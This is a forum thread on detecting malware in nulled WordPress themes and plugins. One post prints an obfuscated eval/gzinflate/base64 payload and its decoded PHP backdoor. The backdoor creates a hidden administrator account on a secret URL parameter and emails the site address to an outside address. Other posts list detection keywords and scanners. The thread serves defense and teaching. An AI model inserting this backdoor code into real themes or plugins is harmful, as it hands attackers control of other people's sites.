Must Read: How to detect Malicious code in nulled or Free WordPress Themes and Plugins

[romeocameo]

When I downloaded exploit scanner from here...

http://wordpress.org/extend/plugins/exploit-scanner/

and scan with virus total ... said

Bkav VEX6466.Webshell

Is it some sort of backdoor?

[mr.brovo]

wow..i learn something new here..thanks op

[tajin]

nearly all my plugin have malicious code -_-
should i delete them all ?

[jethroucc]

(07-18-2015 03:19 PM)tajin Wrote:  nearly all my plugin have malicious code -_-
should i delete them all ?

Yes, highly suggested.. Odd question really.

To add to the OP's post, another great tool to scan your wordpress plugins/themes is GOTMLS Exploit Scanner. Very similar to the one listed already, this one has more active updates and is easy to update, and has a LOT more definitions and (in my opinion) better detection.

But it's HOW you detect this shit - Most malware in these plugins and themes used encryption (mostly base_64) to hide themselves.. Essentially, if the other scanning plugin doesn't have the known viral definition, it won't pick something up.

This one not only can detect more known, but also lets you check "potentially compromised" scripts by looking for some key things that are may be malware (eval(base64_decode or <?php echo stripslashes($wpl_header_desc); ?> uses) and lets you exmaine them a little closer.

BUT - some scripts use these kkind of functions for normal, legit purposes. So how to tell? So our script finds something that may be suspicious. It finds a line that contains the following code:

Code:

eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9​a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCO​BjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP​17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL​8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );

[/quote]

That's a lot of decoding for a script to do isn't it? Lines like this need to be looked at closer. Some decoding work (well, a lot to be honest. no one said this was gonna be easy) reveals:

Code:

add_action('wp_head', 'my_wpfunww7x');
function my wpfunww7x() {
    If ($_GET['cms'] == 'jjoplmh') {
        require('wp-includes/registration.php');
        If (!username_exists('wordpress')) {
            $user_id = wp_create_user('wordpress','gh67io9Cjm');
            $user = new wp_User($user_id);
            $user->set_role('administrator');
        }
    }
}
add_action('wp_head', 'my_wpfunww7c8');
function my_wpfunww7c8(){
    If (!username_exists('wordpress'))
    {
        $addressdecode="thomasza@gmx.com";
        $vari='Wordpress Plugin';
        mail($addressdecode,get_bloginfo('wpurl'),$vari);
    }
}

Which of course should be fairly easy to tell that some asshat is attempting making a new user, set that user as an admin, then email himself the good news.

Decoding these scripts is the tough part here. Takes some decent understanding of PHP, and how to obfuscate/deobfuscate, potentially using several different types of encryption, and possibly having to follow a path of different PHP scripts being used together. If memory serves me right, this encoded statement was itself, encoded, inserted into another script, and then pointed to by yet another..

Thankfully, it can sometimes be easy to tell if a script is legit or malicious. Sometimes encryption is minimal enough, or a more simple method is used, or not at all. Don't assume that just because a statement is short, however, that it's safe. You'd be surprised what you can fit into a piece of code 5% this size. Also, your friend google can help you here again. You can quite literally pop a string into google (surrounded by "quotes"), and it will likely return results, which may point to a script being clean or not.

While it's possible to explain the steps involved in the encoding/decoding process, it would have to be it's own thread at the very least, and would take hours to write out something cohesive enough to call a "guide". Rather, I'll suggest hitting google. "encode/decode" and "obfuscate/deobfuscate" are gonna be helpful keywords. And frankly, i'm still not the best at it. The script above was a "practice" script for m years ago, but I can't find the link to the site that explained the whole process.. Will post it later if I can.

One last thing - If you are unsure (and i mean ANY doubt exists in your mind) that a script isn't clean.. DO NOT USE IT. "Well couldn't i just put it on a shared host?". Yes, you d****. You could, but don't be part of a giant sub-section of web users that contributes to free hosting being shut down across the world. The reason free hosts nowadays are such shit is because of crap like this and webshells.

You can scan the PHP files individually (or search i should say?) for things like "base64 _decode" or "gzinflate". Get tricky with it, try "edoced_46esab" and so on. Too much work (slacker)? Run it locally, using a webserver (like WAMP for windows users, XAMPP for linux, or, for people uncomfortable with setting up even those two, AAMPS), which will also let you monitor the actual traffic and inbound/outbound connections being utilized by PHP and HTTP queries.

If there is a real need or desire for a guide to be written on the subject in detail, and eough people express an interest, I may write one up. Or maybe one of our amazing crackers (and experts compared to myself) programmers/crackers could write one out, I would be happy to help with such a project to say the least. Be safe, don't use scripts from MOST sites giving them away free (what is the benefit to the site exactly?), and always keep an eye out for suspicious activity anywhere you may have used one or part of one at any time. And don't be lazy. That's why shit like this has a place to happen in the first place.

Rep's always appreciated, contributing takes time! Support your contributors like they support you!

[intrepid]

Everyone should get the following to monitor their Wordpress installation:
1. Wordfence
2. Bruteprotect
3. Web host with additional file/hack monitoring

If you download shares from blackhat forums or anywhere else, you have to check for traffic stealing malware, or malware that loads ads, or uses your hosting to launch attacks on other sites. Ask Wordfence or Securi to check your files for all types of malware which are hidden in .png files, cURL and other scripts.

Last year I downloaded MyMail from a user here called Jezuz and the next day my WP stats showed that I lost a lot of traffic. Ever since, I buy my own plugins and themes. Blackhatters use these forums to distribute their malware code and if one site on a server is infected ALL SITES ON THAT SERVER ARE INFECTED AND ARE USED BY THE THIEVES.

Anytime you shares, especially those that state "Always Updated" then be leary of the bas_urd sharing. You have been warned.

[Smoochy Pro]

Very Useful Article thank you for sharing it with us it is such a useful article nowadays!

[PandaBB]

Thanks intrepid for the tip. good plugins i tried wordfence

[Sahaj]

Great thread, thank a lot

[sfenix]

useful information, thanks
rep added

[dr jones]

Thank you for the help on finding that horrid WPlocker crap ..